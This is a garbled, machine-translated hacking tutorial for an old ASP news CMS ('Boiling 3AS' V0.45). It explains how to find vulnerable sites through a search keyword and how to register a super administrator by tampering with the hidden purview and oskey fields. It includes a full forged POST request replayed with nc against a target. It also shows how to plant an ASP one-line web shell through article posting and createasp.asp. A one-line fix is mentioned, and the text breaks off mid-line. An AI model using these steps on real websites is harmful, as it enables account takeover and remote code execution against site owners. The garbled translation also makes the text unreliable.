Boiling 3AS stray dust edge news system (core: Dust edge yundun Graphic System) V0.45 ACCESS Edition

Leakage hole: boiling 3AS stray dust margin news System Registration Vulnerability
Hazards: Super administrator accounts can be registered at will
Usage:

Search for the target and search for the Keyword: V0.45 ACCESS Version Finish

Boiling news system (hereinafter referred to as boiling) after the File Upload Vulnerability exists, it has been a long time

And changed the File Upload leakage.

The SQL injection vulnerability is changed, or after a bunch of MD5 ciphertext values are injected, is the system free of the vulnerability?

? Of course, the answer is no,

Today, let's explore another new vulnerability in the news system-Registration Vulnerability.

1. Search for objects
There are a lot of websites to use. You only need to enter "V0.45 ACCESS Version Finish" in google.

To
Find a bunch of websites that use this system.
Since it is a Registration Vulnerability, of course, first determine whether the website we have found has enabled the user registration function.

Users who use this system more

You do not need to register this function, but it is not disabled. You only need to enter
Http: // target/admin/adduser. asp. If the user registration function is not disabled

The registration page is displayed. If

I disabled searching for a website and followed my next article.
2. Capture change data packets
After you confirm to enable the registration, we can register it. Do not confirm the registration after filling in the relevant information.

We use WsockExpert to monitor

View the page we want to submit.

From the data packet, we can see all the parameters we submit to the server, except for the parameters in the form.

There are some default implicit Parameters

, Purview = 1 & oskey = selfreg? Level = 1 & cmdOk = + % C8 % B7 + % B6 % A8 +

All of my friends are satisfied.

Oskey = super indicates that the user is a system administrator.

This is the Super administrator.

. These parameters must be submitted from the local machine during registration, which means we can submit the number of changes from the local machine.

The data package reaches the registration of a super

The purpose of the Administrator.
Save all the data packages in Figure 2 that we just caught as a one-stop file, such as 4.txt, and modify the data.

Username =

The user name, purview value, and oskey value that you want to apply for are changed to 99999, and super.

, The package size can be not modified

Then, save nc.exeand 4.txt to the c root directory.
3. Register a super administrator user
Go to the command line mode and use nc to submit the modified data packet. The command is as follows:
Nc www.xxxyy.com 80 <4.txt (www.xxxyy.com serves as the target domain name or ip address for data submission)

After submission, there will be a corresponding prompt. If the registration is successful, there will be 4 success prompts.
Indicates that we have registered a user and used the user name and password registered by submitting data packets to log on to the background.

, You can see all the news versions

It indicates that we have successfully registered a super administrator user.
4. Vulnerability Solutions
This is only a small vulnerability. The solution is to save the registration information, and the administrator ID value is not

Read from the value passed in the form

Directly with a fixed value.

1. submit the application through NC to register the administrator account.
Capture packets while registering with/admin/adduser. asp on the user registration page

POST/admin/saveuser. asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

Application/x-shockwave-flash ,*/*
Referer: http://www.xxxx.net/admin/adduser.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xxxx.net
Content-Length: 288
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDAADCRSQQ = PCJDJCPBKPKCEBKDHPJPIANI;

Sdlyyzecho = lao = True; sdlyyz = lao = 2

Username = 123 & passwd = 123456 & passwd2 = 123456 & question = 1% 2B1% 3D %

3F & answer = 3333 & fullname = % BA % A3 % B5 % C1 & depid = 17 & sex = % B1 % A3 % C3 %

DC & birthyear = 1950 & birthmonth = 1 & birthday = 1 & tel = 1333333333 & email = 33333 @ t

Om.com & photo = & content = & purview = 99999 & oskey = super?

Level = 1 & jingyong = 0 & cmdOk = + % C8 % B7 + % B6 % A8 +

Modify the oskey = super purview = 99999 in the Cookie. You can register as an administrator after submitting the request using NC.

 

2. a website that can be registered inserts an image by posting an article. Save the remote image and insert a sentence.

The following is a trojan code. Because the Boiling System filters out some special characters, a Trojan is used.

Deformation required
<%
Response. write "<% execute request ("""
Response. write "33 "")"
Response. write "%" & ">"
%>

3. Insert <% execute request ("33") %>
Call admin/createasp. asp
Call lastnewsxp. asp
The procedure is as follows:
Step 1. Register a user and escalate Permissions

Check whether http: // target website/admin/adduser. asp exists

If yes, view the source code change and save it as an htm file.

"[1] Change action = saveuser. asp of modifying form attributes to action =

Http: // target website/admin/sa

Veuser. asp

"[2] modify <input name =" purview "type =" hidden "value =" ">
<Input name = "oskey" type = "hidden"

Value = "">

The value of purview is 99999. The value of oskey is super.

And then submit the local registration

You can also use registration to capture packets and submit them with nc. The effect is the same.

Register as a super Administrator

Step 2: Use webshell in the background

Method 1:

Article management publishing an article write a trojan in the title and post it

Open http: // target website/admin/createasp. asp to call the update.

The homepage has been updated when asp is called.

Use a trojan client to connect to http: // target website/lastnewsxp. asp

To pony

Method 2: (for websites that support php)

Add php Upload type

Insert a php Trojan and view the html code to get the address.

Method 3: (I did not succeed in the online tutorial)

Can be registered sites by posting articles insert images save remote image insertion

One sentence

Below is a trojan code because the Boiling System filters some special characters

So a trojan will be distorted.
<%
Response. write "<% execute request

("""
Response. write "33 "")"
Response. write "%" & ">"
& Nb